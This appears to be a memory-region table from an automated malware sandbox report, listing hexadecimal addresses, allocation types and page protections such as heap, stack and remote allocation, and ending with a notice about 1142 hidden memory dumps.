2A4C84C4000
|
heap
|
page read and write
|
||
|
17C213A0000
|
heap
|
page read and write
|
||
|
265FDB77000
|
heap
|
page read and write
|
||
|
20C7F000
|
stack
|
page read and write
|
||
|
7FF789BC1000
|
unkown
|
page execute read
|
||
|
6F3000
|
heap
|
page read and write
|
||
|
22C67110000
|
heap
|
page read and write
|
||
|
7FF67DF4E000
|
unkown
|
page readonly
|
||
|
2568000
|
direct allocation
|
page read and write
|
||
|
15A42DB1000
|
trusted library allocation
|
page read and write
|
||
|
7FF789C1D000
|
unkown
|
page readonly
|
||
|
7FF67DE31000
|
unkown
|
page execute read
|
||
|
7FF789BC0000
|
unkown
|
page readonly
|
||
|
17C1ED4C000
|
heap
|
page read and write
|
||
|
7FF789BC1000
|
unkown
|
page execute read
|
||
|
265FDB7C000
|
heap
|
page read and write
|
||
|
998A70D000
|
stack
|
page read and write
|
||
|
2A4C8470000
|
heap
|
page read and write
|
||
|
83E000
|
heap
|
page read and write
|
||
|
7FF789C1D000
|
unkown
|
page readonly
|
||
|
19DB2014000
|
heap
|
page read and write
|
||
|
1A93F000
|
stack
|
page read and write
|
||
|
2078D000
|
direct allocation
|
page read and write
|
||
|
7E7000
|
heap
|
page read and write
|
||
|
28427260000
|
heap
|
page read and write
|
||
|
1FB5C6A0000
|
heap
|
page read and write
|
||
|
15A34910000
|
trusted library allocation
|
page read and write
|
||
|
24CC000
|
stack
|
page read and write
|
||
|
26580000000
|
trusted library allocation
|
page read and write
|
||
|
7FF67DE30000
|
unkown
|
page readonly
|
||
|
1FD2275B000
|
heap
|
page read and write
|
||
|
7FF789C01000
|
unkown
|
page read and write
|
||
|
7FF789C01000
|
unkown
|
page read and write
|
||
|
2F30000
|
heap
|
page read and write
|
||
|
293023C0000
|
heap
|
page read and write
|
||
|
22C6760B000
|
heap
|
page read and write
|
||
|
15E7DF90000
|
heap
|
page read and write
|
||
|
7F19F000
|
direct allocation
|
page read and write
|
||
|
7FF789C19000
|
unkown
|
page readonly
|
||
|
7FF789BFD000
|
unkown
|
page write copy
|
||
|
1B000000
|
remote allocation
|
page read and write
|
||
|
15A34634000
|
trusted library allocation
|
page read and write
|
||
|
2F0E000
|
stack
|
page read and write
|
||
|
1FD22690000
|
heap
|
page read and write
|
||
|
2F98000
|
heap
|
page read and write
|
||
|
232A000
|
direct allocation
|
page read and write
|
||
|
7FBDF000
|
direct allocation
|
page read and write
|
||
|
15A30EB0000
|
heap
|
page read and write
|
||
|
7F319000
|
direct allocation
|
page read and write
|
||
|
7E730000
|
direct allocation
|
page read and write
|
||
|
7FF789BF2000
|
unkown
|
page readonly
|
||
|
1F831E95000
|
heap
|
page read and write
|
||
|
30EBABA000
|
stack
|
page read and write
|
||
|
1B43D000
|
heap
|
page read and write
|
||
|
1D519FA8000
|
heap
|
page read and write
|
||
|
7FF789BF2000
|
unkown
|
page readonly
|
||
|
7FF789BF2000
|
unkown
|
page readonly
|
||
|
7FF703A59000
|
unkown
|
page readonly
|
||
|
30EB979000
|
stack
|
page read and write
|
||
|
19DB2028000
|
heap
|
page read and write
|
||
|
7FF789C19000
|
unkown
|
page readonly
|
||
|
7F240000
|
direct allocation
|
page read and write
|
||
|
1A0BF5F0000
|
heap
|
page read and write
|
||
|
1F831EA0000
|
heap
|
page read and write
|
||
|
15A30CAE000
|
heap
|
page read and write
|
||
|
7FF789C19000
|
unkown
|
page readonly
|
||
|
7FF789BC0000
|
unkown
|
page readonly
|
||
|
7D9000
|
heap
|
page read and write
|
||
|
17C1ED1B000
|
heap
|
page read and write
|
||
|
1F831C80000
|
heap
|
page read and write
|
||
|
52B000
|
unkown
|
page write copy
|
||
|
630000
|
heap
|
page read and write
|
||
|
1E508A34000
|
heap
|
page read and write
|
||
|
284270BC000
|
heap
|
page read and write
|
||
|
19D000
|
stack
|
page read and write
|
||
|
7F0000
|
heap
|
page read and write
|
||
|
15A4ADC7000
|
heap
|
page read and write
|
||
|
7FF789BF2000
|
unkown
|
page readonly
|
||
|
33C30000
|
heap
|
page read and write
|
||
|
15A4B040000
|
heap
|
page read and write
|
||
|
1FB5C6C6000
|
heap
|
page read and write
|
||
|
7FF789C19000
|
unkown
|
page readonly
|
||
|
1A63E000
|
direct allocation
|
page read and write
|
||
|
17C1ED48000
|
heap
|
page read and write
|
||
|
15E7DFA0000
|
heap
|
page read and write
|
||
|
265FDB6A000
|
heap
|
page read and write
|
||
|
1B327000
|
heap
|
page read and write
|
||
|
1D519FA5000
|
heap
|
page read and write
|
||
|
7FF67DFAA000
|
unkown
|
page write copy
|
||
|
1F831B70000
|
heap
|
page read and write
|
||
|
1F831D80000
|
heap
|
page read and write
|
||
|
7FF848ECC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C6B9190000
|
heap
|
page read and write
|
||
|
7EAC0000
|
direct allocation
|
page read and write
|
||
|
7F290000
|
direct allocation
|
page read and write
|
||
|
30CF000
|
stack
|
page read and write
|
||
|
7FF789C1C000
|
unkown
|
page write copy
|
||
|
7FF789BFD000
|
unkown
|
page write copy
|
||
|
7FF789C1D000
|
unkown
|
page readonly
|
||
|
2859E7B000
|
stack
|
page read and write
|
||
|
7F30A000
|
direct allocation
|
page read and write
|
||
|
22F0000
|
direct allocation
|
page read and write
|
||
|
7FF789BC1000
|
unkown
|
page execute read
|
||
|
7FF7039FA000
|
unkown
|
page readonly
|
||
|
7748BFF000
|
stack
|
page read and write
|
||
|
7FF789C14000
|
unkown
|
page read and write
|
||
|
55E000
|
unkown
|
page write copy
|
||
|
17C1EE30000
|
heap
|
page read and write
|
||
|
1C600AB5000
|
heap
|
page read and write
|
||
|
7FE1F000
|
direct allocation
|
page read and write
|
||
|
BEB1C7E000
|
stack
|
page read and write
|
||
|
7FF789BFD000
|
unkown
|
page read and write
|
||
|
7FF789BFD000
|
unkown
|
page read and write
|
||
|
7FF789BFD000
|
unkown
|
page write copy
|
||
|
1C600850000
|
heap
|
page read and write
|
||
|
EA5EFFF000
|
stack
|
page read and write
|
||
|
7FF789BC0000
|
unkown
|
page readonly
|
||
|
265FDD65000
|
heap
|
page read and write
|
||
|
9B000
|
stack
|
page read and write
|
||
|
1E508A30000
|
heap
|
page read and write
|
||
|
3200000
|
heap
|
page read and write
|
||
|
33AEF000
|
stack
|
page read and write
|
||
|
1FD2269C000
|
heap
|
page read and write
|
||
|
7FF789C1D000
|
unkown
|
page readonly
|
||
|
837000
|
heap
|
page read and write
|
||
|
7FD50000
|
direct allocation
|
page read and write
|
||
|
FC900FC000
|
stack
|
page read and write
|
||
|
46264FF000
|
stack
|
page read and write
|
||
|
7EB2F000
|
direct allocation
|
page read and write
|
||
|
7FF67DFC8000
|
unkown
|
page readonly
|
||
|
1D519FA8000
|
heap
|
page read and write
|
||
|
1BA59000
|
direct allocation
|
page execute and read and write
|
||
|
2859FFC000
|
stack
|
page read and write
|
||
|
1C6B91B3000
|
heap
|
page read and write
|
||
|
284270B4000
|
heap
|
page read and write
|
||
|
17C1ED48000
|
heap
|
page read and write
|
||
|
15A30CDA000
|
heap
|
page read and write
|
||
|
15A4AE7A000
|
heap
|
page read and write
|
||
|
284270B8000
|
heap
|
page read and write
|
||
|
A216DDB000
|
stack
|
page read and write
|
||
|
2859DF6000
|
stack
|
page read and write
|
||
|
30EB34E000
|
stack
|
page read and write
|
||
|
7FF67DFB4000
|
unkown
|
page write copy
|
||
|
55A000
|
unkown
|
page read and write
|
||
|
1C6B919D000
|
heap
|
page read and write
|
||
|
7FA30000
|
direct allocation
|
page read and write
|
||
|
1A733000
|
direct allocation
|
page read and write
|
||
|
7FF789BFD000
|
unkown
|
page read and write
|
||
|
1A0BF3A0000
|
heap
|
page read and write
|
||
|
7FF789C1D000
|
unkown
|
page readonly
|
||
|
1FD22736000
|
heap
|
page read and write
|
||
|
1B69F000
|
heap
|
page read and write
|
||
|
1FD2272A000
|
heap
|
page read and write
|
||
|
7F480000
|
direct allocation
|
page read and write
|
||
|
7FF789BC1000
|
unkown
|
page execute read
|
||
|
15A327C2000
|
heap
|
page read and write
|
||
|
17C1EBD0000
|
heap
|
page read and write
|
||
|
7F060000
|
direct allocation
|
page read and write
|
||
|
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
|
17C1ED4C000
|
heap
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
|
798000
|
heap
|
page read and write
|
||
|
1AD7E000
|
stack
|
page read and write
|
||
|
7FF789C19000
|
unkown
|
page readonly
|
||
|
15E7E2B0000
|
heap
|
page read and write
|
||
|
15A4AE3B000
|
heap
|
page read and write
|
||
|
1B6BA000
|
heap
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
19DB3AC0000
|
heap
|
page read and write
|
||
|
1A0BF7B0000
|
heap
|
page read and write
|
||
|
22E2000
|
direct allocation
|
page read and write
|
||
|
7FF67DFB8000
|
unkown
|
page read and write
|
||
|
7FF849150000
|
trusted library allocation
|
page read and write
|
||
|
20E1E000
|
stack
|
page read and write
|
||
|
2FA7000
|
heap
|
page read and write
|
||
|
7FF67DF4E000
|
unkown
|
page readonly
|
||
|
FCB2D0C000
|
stack
|
page read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7F0E0000
|
direct allocation
|
page read and write
|
||
|
17C1ED3F000
|
heap
|
page read and write
|
||
|
1C6008E8000
|
heap
|
page read and write
|
||
|
7F200000
|
direct allocation
|
page read and write
|
||
|
CD0037E000
|
stack
|
page read and write
|
||
|
7FF789C14000
|
unkown
|
page read and write
|
||
|
7FF67DFAA000
|
unkown
|
page write copy
|
||
|
1FD22726000
|
heap
|
page read and write
|
||
|
2338000
|
direct allocation
|
page read and write
|
||
|
1FD22726000
|
heap
|
page read and write
|
||
|
1FD24080000
|
heap
|
page read and write
|
||
|
7FF789BF2000
|
unkown
|
page readonly
|
||
|
7FC35000
|
direct allocation
|
page read and write
|
||
|
7EB40000
|
direct allocation
|
page read and write
|
||
|
1B000000
|
remote allocation
|
page read and write
|
||
|
2331000
|
direct allocation
|
page read and write
|
||
|
7F240000
|
direct allocation
|
page read and write
|
||
|
1B029000
|
direct allocation
|
page execute and read and write
|
||
|
7FF789C0F000
|
unkown
|
page read and write
|
||
|
837000
|
heap
|
page read and write
|
||
|
2340000
|
direct allocation
|
page execute and read and write
|
||
|
1E50A5A0000
|
heap
|
page read and write
|
||
|
7FF789BF2000
|
unkown
|
page readonly
|
||
|
7FF67DFAA000
|
unkown
|
page write copy
|
||
|
15A339E2000
|
trusted library allocation
|
page read and write
|
||
|
7FF7039FD000
|
unkown
|
page readonly
|
||
|
7FF848ED0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7EB50000
|
direct allocation
|
page read and write
|
||
|
19DB1F50000
|
heap
|
page read and write
|
||
|
2303000
|
direct allocation
|
page read and write
|
||
|
1C10F8A8000
|
heap
|
page read and write
|
||
|
7E8C0000
|
direct allocation
|
page read and write
|
||
|
1FD22650000
|
heap
|
page read and write
|
||
|
A0F000
|
stack
|
page read and write
|
||
|
15A4ADB0000
|
heap
|
page read and write
|
||
|
7B3000
|
heap
|
page read and write
|
||
|
7EFD0000
|
direct allocation
|
page read and write
|
||
|
2BF6F4B5000
|
heap
|
page read and write
|
||
|
740000
|
heap
|
page read and write
|
||
|
215EF0B0000
|
heap
|
page read and write
|
||
|
7FF789BC0000
|
unkown
|
page readonly
|
||
|
3386F000
|
stack
|
page read and write
|
||
|
7DF4E8B70000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D519FA8000
|
heap
|
page read and write
|
||
|
22C65340000
|
heap
|
page read and write
|
||
|
4B40000
|
heap
|
page read and write
|
||
|
19DB1F80000
|
heap
|
page read and write
|
||
|
2BF6F760000
|
heap
|
page read and write
|
||
|
17C1ED4E000
|
heap
|
page read and write
|
||
|
15A3477C000
|
trusted library allocation
|
page read and write
|
||
|
7FF789BF2000
|
unkown
|
page readonly
|
||
|
22C67080000
|
heap
|
page read and write
|
||
|
15A30F85000
|
heap
|
page read and write
|
||
|
2FAF000
|
heap
|
page read and write
|
||
|
7FF849100000
|
trusted library allocation
|
page read and write
|
||
|
293023A0000
|
heap
|
page read and write
|
||
|
2859F7E000
|
stack
|
page read and write
|
||
|
1F1FB040000
|
heap
|
page read and write
|
||
|
7FF789C1C000
|
unkown
|
page write copy
|
||
|
30EBD3F000
|
stack
|
page read and write
|
||
|
1F831CA4000
|
heap
|
page read and write
|
||
|
7FF789BF2000
|
unkown
|
page readonly
|
||
|
265FDB20000
|
heap
|
page read and write
|
||
|
22C65430000
|
heap
|
page read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
1A6D4000
|
direct allocation
|
page read and write
|
||
|
28427086000
|
heap
|
page read and write
|
||
|
7FF789C0F000
|
unkown
|
page read and write
|
||
|
7EB70000
|
direct allocation
|
page read and write
|
||
|
265FDD6C000
|
heap
|
page read and write
|
||
|
2859EFF000
|
stack
|
page read and write
|
||
|
208FE000
|
stack
|
page read and write
|
||
|
7FF789C0F000
|
unkown
|
page read and write
|
||
|
1730D0CC000
|
heap
|
page read and write
|
||
|
7FF789C19000
|
unkown
|
page readonly
|
||
|
15A32760000
|
trusted library allocation
|
page read and write
|
||
|
1B7F9000
|
heap
|
page read and write
|
||
|
1F1FB380000
|
heap
|
page read and write
|
||
|
1C6B91B8000
|
heap
|
page read and write
|
||
|
7FF67DFBD000
|
unkown
|
page readonly
|
||
|
7FF789C14000
|
unkown
|
page read and write
|
||
|
30EB8FD000
|
stack
|
page read and write
|
||
|
2842708A000
|
heap
|
page read and write
|
||
|
2BF6F765000
|
heap
|
page read and write
|
||
|
1A0BF448000
|
heap
|
page read and write
|
||
|
7FF789C19000
|
unkown
|
page readonly
|
||
|
7FF789C1C000
|
unkown
|
page write copy
|
||
|
15A30D80000
|
heap
|
page read and write
|
||
|
1F831C50000
|
heap
|
page read and write
|
||
|
22FC000
|
direct allocation
|
page read and write
|
||
|
20B3F000
|
stack
|
page read and write
|
||
|
7F0E0000
|
direct allocation
|
page read and write
|
||
|
1B04E000
|
stack
|
page read and write
|
||
|
781000
|
heap
|
page read and write
|
||
|
7FF789BFD000
|
unkown
|
page read and write
|
||
|
1AE7E000
|
stack
|
page read and write
|
||
|
7FF789C0F000
|
unkown
|
page read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
7FF67DFBD000
|
unkown
|
page readonly
|
||
|
210D4000
|
direct allocation
|
page execute and read and write
|
||
|
7FF789BFD000
|
unkown
|
page write copy
|
||
|
15A32E39000
|
trusted library allocation
|
page read and write
|
||
|
5FE000
|
stack
|
page read and write
|
||
|
1A700000
|
direct allocation
|
page read and write
|
||
|
3247000
|
heap
|
page read and write
|
||
|
28429050000
|
trusted library allocation
|
page read and write
|
||
|
215EF110000
|
heap
|
page read and write
|
||
|
7E9E0000
|
direct allocation
|
page read and write
|
||
|
29302525000
|
heap
|
page read and write
|
||
|
A21707E000
|
stack
|
page read and write
|
||
|
1BA1F000
|
direct allocation
|
page execute and read and write
|
||
|
79D000
|
heap
|
page read and write
|
||
|
15A4AE94000
|
heap
|
page read and write
|
||
|
6F0000
|
heap
|
page read and write
|
||
|
7FF789C1C000
|
unkown
|
page write copy
|
||
|
2FBE000
|
heap
|
page read and write
|
||
|
53D36FC000
|
stack
|
page read and write
|
||
|
304D6FF000
|
stack
|
page read and write
|
||
|
B70000
|
heap
|
page read and write
|
||
|
825000
|
heap
|
page read and write
|
||
|
7FF789BFD000
|
unkown
|
page write copy
|
||
|
78D000
|
heap
|
page read and write
|
||
|
5AE000
|
stack
|
page read and write
|
||
|
796000
|
heap
|
page read and write
|
||
|
207A3000
|
direct allocation
|
page read and write
|
||
|
208BB000
|
stack
|
page read and write
|
||
|
766000
|
heap
|
page read and write
|
||
|
1FB5C6C4000
|
heap
|
page read and write
|
||
|
22F4000
|
direct allocation
|
page read and write
|
||
|
1B43A000
|
heap
|
page read and write
|
||
|
7FF789BFD000
|
unkown
|
page write copy
|
||
|
1BA61000
|
direct allocation
|
page execute and read and write
|
||
|
15A42E23000
|
trusted library allocation
|
page read and write
|
||
|
7FF789BF2000
|
unkown
|
page readonly
|
||
|
7FC2F000
|
direct allocation
|
page read and write
|
||
|
210D8000
|
direct allocation
|
page execute and read and write
|
||
|
30EB7FE000
|
stack
|
page read and write
|
||
|
7F1A8000
|
direct allocation
|
page read and write
|
||
|
30EB67F000
|
stack
|
page read and write
|
||
|
7EB10000
|
direct allocation
|
page read and write
|
||
|
7FF789C14000
|
unkown
|
page read and write
|
||
|
15A4AE65000
|
heap
|
page read and write
|
||
|
7FF7039F1000
|
unkown
|
page execute read
|
||
|
7EF70000
|
direct allocation
|
page read and write
|
||
|
C1CF7DC000
|
stack
|
page read and write
|
||
|
1D519F80000
|
heap
|
page read and write
|
||
|
15A4AE9F000
|
heap
|
page read and write
|
||
|
1FD22723000
|
heap
|
page read and write
|
||
|
2A4C8558000
|
heap
|
page read and write
|
||
|
7FF67DFBD000
|
unkown
|
page readonly
|
||
|
2430000
|
heap
|
page read and write
|
||
|
51C000
|
unkown
|
page write copy
|
||
|
7EE000
|
heap
|
page read and write
|
There are 1142 hidden memdumps, click here to show them.